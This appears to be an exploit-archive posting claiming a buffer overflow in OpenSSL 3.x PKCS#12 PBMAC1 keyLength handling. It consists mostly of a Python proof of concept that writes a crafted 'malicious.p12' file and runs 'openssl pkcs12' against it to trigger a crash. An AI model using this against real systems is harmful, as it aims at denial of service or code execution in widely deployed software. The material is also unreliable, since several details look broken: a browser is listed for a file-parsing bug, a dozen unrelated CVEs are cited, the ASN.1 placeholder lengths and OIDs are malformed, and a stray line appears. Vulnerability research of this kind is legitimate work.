OpenSSL 3.x PKCS#12 PBMAC1 KeyLength Buffer Overflow
=============================================================================================================================================
| # Title OpenSSL 3.x PKCS#12 PBMAC1 KeyLength Buffer Overflow
=============================================================================================================================================
| # Title : OpenSSL 3.x PKCS#12 PBMAC1 KeyLength Buffer Overflow |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : https://www.openssl-library.org/ |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/214422/ & CVE-2025-11187, CVE-2025-15467, CVE-2025-15468, CVE-2025-15469, CVE-2025-66199,
CVE-2025-68160, CVE-2025-69418, CVE-2025-69419, CVE-2025-69420, CVE-2025-69421,
CVE-2026-22795, CVE-2026-22796
[+] Summary : This Proof of Concept demonstrates a buffer overflow vulnerability in OpenSSL versions 3.4 to 3.6 related to improper handling of the PBMAC1 keyLength parameter in PKCS#12 files.
By crafting a malicious PKCS#12 structure with an excessively large keyLength value, the PoC triggers a memory overflow in the MAC processing logic,
potentially leading to a segmentation fault and, under certain conditions, remote code execution (RCE).
The exploit works by abusing ASN.1-encoded PBMAC1 parameters, specifically exceeding the expected 64?byte buffer used internally by OpenSSL.
When the generated malicious.p12 file is parsed using the openssl pkcs12 command, vulnerable versions may crash or hang, indicating successful triggering of the flaw.
[+] POC :
#!/usr/bin/env python3
import struct
import os
from hashlib import sha256
def create_malicious_pkcs12():
pkcs12_template = bytes([
0x30, 0x82, 0xFF, 0xFF,
0x02, 0x01, 0x03,
0x30, 0x82, 0xFF, 0xFF,
0x30, 0x82, 0xFF, 0xFF,
0x06, 0x09, 0x2A, 0x86, 0x48, 0x86, 0xF7, 0x0D, 0x01, 0x07, 0x01,
0xA0, 0x82, 0xFF, 0xFF,
0xA0, 0x82, 0xFF, 0xFF,
0x04, 0x82, 0xFF, 0xFF,
])
macdata = bytearray()
macdata.extend(b'\x30\x82\xFF\xFF')
macdata.extend(b'\x30\x0D')
macdata.extend(b'\x06\x09\x2A\x86\x48\x86\xF7\x0D\x01\x07\x01')
macdata.extend(b'\x05\x00')
macdata.extend(b'\x04\x20')
macdata.extend(os.urandom(32))
macdata.extend(b'\x02\x04\x00\x00\x27\x10') # 10000 iterations
macdata.extend(b'\x30\x82\xFF\xFF')
macdata.extend(b'\x02\x04')
keylength = 1000
macdata.extend(struct.pack('>I', keylength))
macdata.extend(b'\x30\x0C')
macdata.extend(b'\x06\x09\x2A\x86\x48\x86\xF7\x0D\x01\x07\x01')
macdata.extend(b'\x05\x00')
output = bytearray(pkcs12_template)
fake_data = b'\x00' * 100
output.extend(fake_data)
macdata_pos = len(output)
output.extend(macdata)
def set_length(data, pos, length):
if length < 128:
data[pos] = 0x80 + 1
data[pos+1] = length
return 2
else:
len_bytes = (length.bit_length() + 7) // 8
data[pos] = 0x80 + len_bytes + 1
data[pos+1] = 0x80 + len_bytes
for i in range(len_bytes):
data[pos+2+i] = (length >> (8*(len_bytes-1-i))) & 0xFF
return len_bytes + 2
macdata_len = len(macdata) - 4 # Minus the SEQUENCE header
len_bytes = set_length(output, macdata_pos + 1, macdata_len)
with open('malicious.p12', 'wb') as f:
f.write(output)
print("[+] Created malicious PKCS#12 file: malicious.p12")
print(f"[+] KeyLength parameter: {keylength} bytes (buffer is 64 bytes)")
print("[!] When opened with: openssl pkcs12 -info -in malicious.p12")
def test_with_openssl():
import subprocess
print("\n[*] Testing with OpenSSL...")
try:
result = subprocess.run(
['openssl', 'pkcs12', '-info', '-in', 'malicious.p12', '-passin', 'pass:'],
capture_output=True,
text=True,
timeout=5
)
print(f"Return code: {result.returncode}")
if "Segmentation fault" in result.stderr or "buffer overflow" in result.stderr:
print("[+] Vulnerability triggered!")
elif result.returncode != 0:
print(f"[!] OpenSSL crashed with: {result.stderr[:200]}")
else:
print("[-] No crash - maybe patched or wrong OpenSSL version")
except subprocess.TimeoutExpired:
print("[+] OpenSSL appears to have hung/crashed")
except FileNotFoundError:
print("[-] OpenSSL not found in PATH")
if __name__ == "__main__":
print("=== CVE-2025-11187 PoC - PKCS#12 PBMAC1 Buffer Overflow ===\n")
create_malicious_pkcs12()
test_with_openssl()
print("\n[*] For manual testing:")
print(" $ openssl pkcs12 -info -in malicious.p12 -noout")
print(" Expected: segmentation fault or buffer overflow detection")
summary en titel
Greetings to :============================================================
jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|
==========================================================================